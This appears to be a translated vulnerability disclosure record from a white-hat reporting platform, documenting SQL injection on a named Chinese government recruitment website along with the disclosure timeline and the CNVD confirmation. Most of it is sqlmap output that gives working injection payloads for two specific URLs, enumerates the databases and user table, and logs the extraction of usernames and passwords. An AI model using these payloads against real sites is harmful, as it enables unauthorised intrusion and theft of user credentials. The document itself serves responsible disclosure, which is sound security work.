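2013-05-17: Details reported to the vendor; awaiting vendor handling
2013-05-20: Vendor has confirmed; details disclosed only to the vendor
2013-05-30: Details disclosed to core white hats and experts in related fields
2013-06-09: Details disclosed to regular white hats
2013-06-19: Details disclosed to trainee white hats
2013-07-01: Details disclosed to the public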
http://www.whrt.gov.cn:8200/web/tms/JobList.aspx?t=1
Place: GET
Parameter: t
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: t=1' AND 9314=9314 AND 'arrX'='arrX

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: t=1'; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: t=1' WAITFOR DELAY '0:0:5'--
---
http://www.whrt.gov.cn:8200/web/tms/Page.aspx?id=43
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=43' AND 8962=8962 AND 'dCxJ'='dCxJ

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: id=-3937' UNION ALL SELECT 73, CHAR(58)+CHAR(98)+CHAR(121)+CHAR(108)+CHAR(58)+CHAR(72)+CHAR(122)+CHAR(113)+CHAR(116)+CHAR(120)+CHAR(70)+CHAR(102)+CHAR(100)+CHAR(108)+CHAR(87)+CHAR(58)+CHAR(119)+CHAR(100)+CHAR(110)+CHAR(58), 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=43'; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=43' WAITFOR DELAY '0:0:5'--
---
[02:02:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] EUF
[*] master
[*] model
[*] msdb
[*] tempdb
Tables in the key database
Database: EUF
[26 tables]
+------------------------------+
| dbo.EUF_SYS_ButtonPermission |
| dbo.EUF_SYS_Buttons          |
| dbo.EUF_SYS_Dictionary       |
| dbo.EUF_SYS_DictionaryType   |
| dbo.EUF_SYS_Menu             |
| dbo.EUF_SYS_Role             |
| dbo.EUF_SYS_RolePermission   |
| dbo.EUF_SYS_User             |
| dbo.EUF_SYS_UserRole         |
| dbo.PRE_Cate                 |
| dbo.PRE_DocVisitLog          |
| dbo.PRE_QueryLog             |
| dbo.aut_Job                  |
| dbo.aut_Question             |
| dbo.aut_Resume               |
| dbo.aut_p                    |
| dbo.aut_s                    |
| dbo.doc_files                |
| dbo.doc_table1               |
| dbo.doc_table2               |
| dbo.doc_table3               |
| dbo.doc_table4               |
| dbo.doc_table5               |
| dbo.doc_table6               |
| dbo.doc_table7               |
| dbo.index_task               |
+------------------------------+
Database: EUF
Table: dbo.EUF_SYS_User
[8 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| F_LoginUrl | varchar  |
| F_PassWord | varchar  |
| F_RealName | varchar  |
| F_RegDate  | datetime |
| F_RoleID   | varchar  |
| F_State    | varchar  |
| F_UserID   | int      |
| F_UserName | varchar  |
+------------+----------+
Retrieving the data in the table:
[00:34:51] [INFO] fetching entries of column(s) 'F_PassWord, F_UserName' for table 'EUF_SYS_User' in database 'EUF'
[00:34:51] [INFO] fetching number of column(s) 'F_PassWord, F_UserName' entries for table 'EUF_SYS_User' in database 'EUF'
[00:34:51] [INFO] retrieved: 2247
[00:35:13] [INFO] fetching number of distinct values for column 'F_PassWord'
[00:35:13] [INFO] retrieved: 1579
[00:35:41] [INFO] fetching number of distinct values for column 'F_UserName'
[00:35:41] [INFO] retrieved: 2232
[00:36:01] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
......
Severity: High
Vulnerability Rank: 11
Confirmed at: 2013-05-20 23:05
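CNVD confirmed and reproduced the situation described. On the afternoon of the 20th it was passed to CNCERT and issued to the Hubei sub-center, which will follow up and coordinate handling with the organization that manages the website. Scored as complete impact on confidentiality (multiple user records are involved), rank=7.79*1.0*1.4=10.906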
None yet